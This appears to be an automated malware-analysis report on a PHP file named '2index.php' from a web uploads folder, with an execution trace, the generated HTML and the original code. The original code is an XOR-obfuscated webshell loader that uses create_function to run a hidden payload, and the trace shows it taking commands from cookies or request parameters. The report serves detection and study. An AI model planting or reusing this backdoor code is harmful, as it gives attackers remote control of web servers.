2index.php

md5: 621fdac8939044afe82125e865ee4fd0

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Encoding
base64_decode (Traces)

Deobfuscated PHP code
Failed to deobfuscate code
Execution traces
data/traces/621fdac8939044afe82125e865ee4fd0_trace-1676263136.2607.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:39:22.158501]
1	0	1	0.000156	393528
1	3	0	0.000211	395608	{main}	1		/var/www/html/uploads/2index.php	0	0
1		A						/var/www/html/uploads/2index.php	1	$VJcajj = '.AY.YSmU3V1XRRN'
1		A						/var/www/html/uploads/2index.php	1	$KueWZPVl = 'create_function'
1		A						/var/www/html/uploads/2index.php	1	$IENHTli = 'X fgWX<7>= En=KD40+mE 6B7O.AR.oYK8JceVF3g+L: YQ =GCZ5k,A.Xdq83 nmTA;UHwj83KkLlhvyVmhfa5XNjzEurwd0F7O9qwTYiKsvnB=R0< GQ dG 2DLyhzK0gRpas8nUMLxjSzoF7 :TjV:>k=bFG6A-qIKngG<:RP<apGE apSk:FnI<6FA;ZC 2=mAyG8eJgav1Y9.mHd12<:<LphH+;,nZ+KYeUQS MTrhlZSRH.1Qirf-uzb=;iuY<ln=U1OxOAiCOR65HePCHmPL 0oG=DUyTAF -Q;:bJ2JOfWFn A5  P=6km >dqUq -7Tpp<mq.7:ITN hmpn:nzgnjcfJ niV76xdswnFYL: JZAfg9fR40Ji=-2oOAfY0LrZoEsT7;LQedm2Z4F2POhGbKM0PZT-LkXgpH+==R L6QZWQUAE,R101gh9 TcSMF1NQa2VV=JRdk-ZE0kaNm>0 ZqSH0jOLoT3IOD6N2xtAfSDFR8iU<J.T;9'
2	4	0	0.000283	396416	create_function	0		/var/www/html/uploads/2index.php	1	2	''	'if(!function_exists(\'xor_data__mut\')) {\n\tfunction xor_data__mut($data, $key)     {\n\t\t$out = \'\';\n\t\tfor($i = 0; $i<strlen($data); $i++)\n\t\t$out .= ($data[$i] ^ $key[$i % strlen($key)]);\n\t\treturn($out);\n\t}\n}\n\n$data = false;\n$data_key = false;\n\nforeach ($_COOKIE as $key => $value) {\n\t$data_key = $key;\n\t$data = $value;\n}\n\nif (!$data) {\n\tforeach ($_REQUEST as $key => $value) {\n\t\t$data_key = $key;\n\t\t$data = $value;\n\t}\n}\n\n$data = @unserialize(xor_data__mut(base64_decode('
3	5	0	0.000373	404328	{internal eval}	1		/var/www/html/uploads/2index.php	1	0
3	5	1	0.000388	404328
3	5	R			NULL
2	4	1	0.000404	402448
2	4	R			'\000lambda_3'
1		A						/var/www/html/uploads/2index.php	1	$wLZRBSe = '\000lambda_3'
2	6	0	0.000433	401616	__lambda_func	1		/var/www/html/uploads/2index.php	1	0
3	7	0	0.000445	401616	function_exists	0		/var/www/html/uploads/2index.php(1) : runtime-created function	1	1	'xor_data__mut'
3	7	1	0.000461	401656
3	7	R			FALSE
2		A						/var/www/html/uploads/2index.php(1) : runtime-created function	10	$data = FALSE
2		A						/var/www/html/uploads/2index.php(1) : runtime-created function	11	$data_key = FALSE
3	8	0	0.000501	401616	base64_decode	0		/var/www/html/uploads/2index.php(1) : runtime-created function	25	1	FALSE
3	8	1	0.000517	401680
3	8	R			''
3	9	0	0.000530	401648	xor_data__mut	1		/var/www/html/uploads/2index.php(1) : runtime-created function	25	2	''	FALSE
3		A						/var/www/html/uploads/2index.php(1) : runtime-created function	3	$out = ''
3		A						/var/www/html/uploads/2index.php(1) : runtime-created function	4	$i = 0
3	9	1	0.000569	401648
3	9	R			''
3	10	0	0.000581	401616	unserialize	0		/var/www/html/uploads/2index.php(1) : runtime-created function	25	1	''
3	10	1	0.000596	401664
3	10	R			FALSE
2		A						/var/www/html/uploads/2index.php(1) : runtime-created function	25	$data = FALSE
3	11	0	0.000621	401616	md5	0		/var/www/html/uploads/2index.php(1) : runtime-created function	30	1	'localhost'
3	11	1	0.000638	401712
3	11	R			'421aa90e079fa326b6494f812ad13e79'
3	12	0	0.000653	401680	md5	0		/var/www/html/uploads/2index.php(1) : runtime-created function	30	1	'421aa90e079fa326b6494f812ad13e79'
3	12	1	0.000667	401776
3	12	R			'757319b447175b6ca1882635b132a594'
2	6	1	0.000683	401616
1	3	1	0.000690	401616
			0.000719	320392
TRACE END   [2023-02-13 02:39:22.159095]

Generated HTML code
<html><head></head><body>757319b447175b6ca1882635b132a594</body></html>
Original PHP code
<?php $VJcajj='.AY.YSmU3V1XRRN'; $KueWZPVl='M3<O-623F8R,;= '^$VJcajj; $IENHTli='X fgWX<7>= En=KD40+mE 6B7O.AR.oYK8JceVF3g+L: YQ =GCZ5k,A.Xdq83 nmTA;UHwj83KkLlhvyVmhfa5XNjzEurwd0F7O9qwTYiKsvnB=R0< GQ dG 2DLyhzK0gRpas8nUMLxjSzoF7 :TjV:>k=bFG6A-qIKngG<:RP<apGE apSk:FnI<6FA;ZC 2=mAyG8eJgav1Y9.mHd12<:<LphH+;,nZ+KYeUQS MTrhlZSRH.1Qirf-uzb=;iuY<ln=U1OxOAiCOR65HePCHmPL 0oG=DUyTAF -Q;:bJ2JOfWFn A5  P=6km >dqUq -7Tpp<mq.7:ITN hmpn:nzgnjcfJ niV76xdswnFYL: JZAfg9fR40Ji=-2oOAfY0LrZoEsT7;LQedm2Z4F2POhGbKM0PZT-LkXgpH+==R L6QZWQUAE,R101gh9 TcSMF1NQa2VV=JRdk-ZE0kaNm>0 ZqSH0jOLoT3IOD6N2xtAfSDFR8iU<J.T;94T0olENJpvaMWXJ1SVcaxnZDxzwUQ>8gu<Q=fpmNzqpuO tbPwSPfzWTrXKRDIhPkvYugCB,XycUUsBipF0H S0lQNY8H=Q18GJCDR64, +aius2S PPOxfVgiq-R4+.XQqoDTCP.a +H;X4UE2NnikH7 Idzevd,h V+XO47SN4UZpN1:x7=hcpjc jl,tykmegnkYhe'; $wLZRBSe=$KueWZPVl('', '1FNF1-RTJTO+1X3-GDXEbXY0h+O53q04>LmJLv=9nM9TC-8OSg;5G4H Z9;.UFTFI0 O4dWNSV2BlLHVY-gaoEZ-:JGeRULn9OQ KYS=yTkCMNfTnCHR+4NLcDS0-PSZoYLyYkz1J:88XDnZGbSAN51rScKcBb,S8vU kKG4HH>5RIT, YH-zP0Og;YB33UrgOGIDzsNEo7mkRU8MOMuDWSPIYwzL,JOM11N2yXu72L>1Ibf<< -OR9IZBr65-vr,U8OLJV0HoEqaM5.>CPaE+IAI4-TQ0,X=uDte-ETj13F.S>.FjfJV YUEk7KagIXDYtUDLC5YPGgxHXH,5-HHET1h++2+97F+SNM=ROXYMWJ08 OEcz:ln0B6UD+6VHKOraB2U5IPfLW0VO-qXDID;X3WkEa:h6G:t>5Y-KeG0=ENX I-Z8 2y-.7s6PDP87TU K1,5Txe>V35R.7LOI;1QBMnIZQT;.8-ICfwe=Uak W:SXRgF2643A6>Y3q1CPG CGK.+3WZAi39>PzvEGXF7 MRS10JY<RW4DA-DnGLPR,FMVdFe2UN16Bmx3v+PiXBnBPutJoJZ4rZbOVfQ:R2I3:+ g-E8BL4bd43OXCAOFEUWV2T1yfXFvGIQVX=NX9=YK 571uFPJ1W7U1bogUcb-OI=LJLMnQbE5C7gYSffY1oXjni=ek-1+H+t><s<689G:GBpSo'^$IENHTli); $wLZRBSe();
PHP Malware Analysis

2index.php

md5: 621fdac8939044afe82125e865ee4fd0

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
